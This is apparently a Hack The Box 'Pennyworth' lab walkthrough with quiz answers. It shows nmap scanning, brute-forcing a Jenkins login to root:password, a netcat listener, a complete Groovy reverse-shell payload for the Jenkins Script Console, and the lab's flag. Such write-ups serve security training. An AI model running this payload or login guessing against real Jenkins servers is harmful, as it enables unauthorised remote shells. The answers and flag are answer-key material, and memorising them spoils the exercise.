> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/starting-point-machines/tier-1-machines/pennyworth.md).

# Pennyworth

{% file src="/files/IFvcKLRFePXRwYn8T0mv" %}

**Task 1: What does the acronym CVE stand for?**

* Common Vulnerabilities and Exposures

**Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?**

* Confidentiality, Integrity, Availability

**Task 3: What is the version of the service running on port 8080?**

* Run the following nmap command:

```
nmap -sV -p 8080 [Target IP]
```

*

```
<figure><img src="/files/OZwu9W15EZTr3zLdHtr3" alt=""><figcaption></figcaption></figure>
```

* The answer is Jetty 9.4.39.v20210325

**Task 4: What version of Jenkins is running on the target?**

* Start by going to your web browser and typing in `http://[Target IP]:8080`
* At the login page, the source code does not tell us anything usefule
* Try some default passwords. Nothing usual works.
* Run the request through Intruder in Burpsuite to guess username and password
  \*

  ```
  <figure><img src="/files/NXp27RQN8mZ8w6OWRo1H" alt=""><figcaption></figcaption></figure>
  ```
* This shows that root:password is a login
* On the admin page in the bottom right hand corner is version of [Jenkins 2.289.1](https://jenkins.io/)

**Task 5: What type of script is accepted as input on the Jenkins Script Console?**

* On the first admin page, it states `Groovy Script`

**Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?**

* I believe they are asking what the cli is for windows:
* cmd.exe

**Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?**

* In linux, a similar command would be:
* ifconfig

**Task 8: What switch should we use with netcat for it to use UDP transport mode?**

* Quick help search on netcat shows:
  \*

  ```
  <figure><img src="/files/P5a2oNVluvVOLiKJwIVy" alt=""><figcaption></figcaption></figure>
  ```

  * The answer is `-u`

**Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?**

* I just know this as "reverse shell"

**Capture the Flag:**

* Browse for vulnerabilities in Jenkins.
  * Discovered <https://github.com/gquere/pwn_jenkins>
    * Multiple ways to bypass login but at the end is a script you can plugin to the "Script Console" in the "Manage Jenkins" Tab on the right.
      * [http://\[Target IP\]:8080/script](http://10.129.37.54:8080/script)
  * Start up a netcat listener on the host machine:

```
nc -lvnp 4444
```

* in the "Script Console" plugin the following command from the github link below to make a reverse shell connection back to the host machine.

```
String host="HOST_IP";
int port=4444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

* The flag is located in /root/flag.txt
* The flag is "9cdfb439c7876e703e307864c9167a15"
